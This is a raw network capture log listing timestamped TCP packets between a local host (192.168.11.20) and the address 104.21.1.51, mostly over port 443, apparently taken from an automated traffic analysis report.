Dec 11, 2024 12:29:33.583749056 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.584274054 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.584281921 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.584422112 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.584422112 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.584494114 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.584494114 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.584498882 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.584547043 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.584630966 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.585361958 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.585370064 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.585608006 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.585654974 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.585654974 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.585659027 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.585756063 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.585802078 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.586143017 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.586150885 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.586339951 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.586339951 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.586347103 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.586354971 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.586429119 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.586481094 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.587244034 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.587251902 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.587436914 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.587436914 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.587443113 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.587451935 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.587451935 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.587587118 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.588521004 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.588529110 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.588686943 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.588732958 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.588732958 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.588737965 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.588785887 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.588785887 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.588892937 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.589462042 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.589471102 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.589622021 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.589622974 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.589693069 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.589693069 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.589698076 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.589807987 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.590524912 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.590536118 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.590676069 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.590677023 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.590748072 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.590748072 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.590753078 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.590775013 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.590884924 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.591490030 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.591496944 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.591717958 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.591717958 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.591722965 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.591764927 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.591835022 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.592808008 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.592814922 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.592952967 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.592952967 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.592998028 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.593002081 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.593070030 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.593118906 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.593647957 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.593657017 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.593807936 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.593807936 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.593857050 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.593862057 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.593905926 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.593929052 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.594069004 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.594611883 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.594654083 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:33.594809055 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.594809055 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.594858885 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:33.594954967 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:34.502161026 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:35.140244007 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:37.733043909 CET	49756	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:37.733119965 CET	443	49756	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:37.733237028 CET	49756	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:37.733442068 CET	49756	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:37.733464956 CET	443	49756	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:37.972059965 CET	443	49756	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:37.972903967 CET	49756	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:37.972939014 CET	443	49756	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:37.973192930 CET	49756	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:37.973222971 CET	443	49756	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:38.591351032 CET	443	49756	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:38.591571093 CET	443	49756	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:38.591753006 CET	49756	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:38.592015028 CET	49756	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:38.609286070 CET	49757	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:38.609348059 CET	443	49757	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:38.609568119 CET	49757	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:38.609679937 CET	49757	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:38.609719038 CET	443	49757	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:38.849106073 CET	443	49757	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:38.850064039 CET	49757	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:38.850107908 CET	443	49757	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:38.850327969 CET	49757	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:38.850361109 CET	443	49757	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:39.490024090 CET	443	49757	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:39.490272999 CET	443	49757	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:39.490446091 CET	49757	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:39.490667105 CET	49757	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:41.266741037 CET	49759	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:41.266776085 CET	443	49759	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:41.266985893 CET	49759	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:41.267144918 CET	49759	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:41.267162085 CET	443	49759	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:41.373636007 CET	49760	80	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:41.487440109 CET	80	49760	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:41.487689972 CET	49760	80	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:41.487816095 CET	49760	80	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:41.503041983 CET	443	49759	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:41.505992889 CET	49759	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:41.506005049 CET	443	49759	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:41.506185055 CET	49759	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:41.506191969 CET	443	49759	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:41.601546049 CET	80	49760	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:41.920037985 CET	80	49760	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:41.920061111 CET	80	49760	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:41.920075893 CET	80	49760	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:41.920191050 CET	49760	80	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:42.079111099 CET	443	49759	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:42.079149008 CET	443	49759	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:42.079313993 CET	49759	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:42.079672098 CET	49759	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:12.716521978 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:12.716550112 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:12.716811895 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:12.730506897 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:12.730519056 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:12.965815067 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:12.966027975 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:12.969580889 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:12.969595909 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:12.969942093 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:13.000860929 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:13.042263031 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:13.873775005 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:13.873815060 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:13.873842955 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:13.873891115 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:13.874006033 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:13.874018908 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:13.874131918 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:13.917536974 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.116488934 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.116796970 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.116987944 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.117000103 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.117060900 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.117186069 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.117213964 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.117222071 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.117379904 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.117433071 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.117465019 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.117620945 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.117633104 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.167475939 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.353359938 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.353605032 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.353794098 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.353817940 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.353952885 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.353966951 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.354180098 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.354190111 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.354542971 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.354696035 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.354888916 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.354935884 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.354945898 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.355058908 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.355240107 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.355407953 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.355417013 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.355591059 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.595978975 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.596215963 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.596268892 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.596417904 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.596451044 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.596602917 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.596708059 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.596821070 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.596865892 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.596976042 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.597009897 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.597172976 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.597192049 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.597300053 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.597356081 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.597476959 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.597511053 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.597749949 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.598212004 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.598326921 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.598459005 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.598459005 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.598490953 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.598758936 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.599174023 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.599414110 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.599431038 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.599456072 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.599594116 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.651726961 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.837966919 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.837979078 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.838172913 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.838386059 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.838401079 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.838553905 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.838584900 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.839000940 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.839227915 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.840173006 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.840250969 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.840317011 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.840317011 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.840346098 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.840411901 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.840657949 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.840799093 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.840821981 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.840905905 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.841017008 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.841032982 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.841067076 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.841639042 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.841731071 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.841772079 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.841789961 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.841859102 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.841948032 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.842576981 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.842663050 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.842724085 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.842724085 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.842765093 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.842911959 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.843610048 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.843697071 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.843765974 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.843806982 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.843828917 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.843856096 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.886018991 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:14.886054993 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:14.932883978 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.080005884 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.080010891 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.080073118 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.080236912 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.080250978 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.080504894 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.080780029 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.080785036 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.081002951 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.081486940 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.081545115 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.081685066 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.081696987 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.081702948 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.082433939 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.082459927 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.082597971 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.082606077 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.082675934 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.083687067 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.083719969 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.083877087 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.083877087 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.083889961 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.084456921 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.084490061 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.084652901 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.084654093 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.084666014 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.085401058 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.085596085 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.085608006 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.085654020 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.085772038 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.085779905 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.085879087 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.086397886 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.086591959 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.086600065 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.086780071 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.087244034 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.087450027 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.087460041 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.087681055 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.088169098 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.088238955 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.088366985 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.088375092 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.088439941 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.088562965 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.322515965 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.322741985 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.322984934 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.323169947 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.323185921 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.323335886 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.323523998 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.323729992 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.324331045 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.324456930 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.324470997 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.324613094 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.326168060 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.326173067 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.326236963 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.326387882 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.326387882 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.326405048 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.326411009 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:15.326416969 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.326562881 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:15.328130960 CET	443	49761	104.21.1.51	192.168.11.20
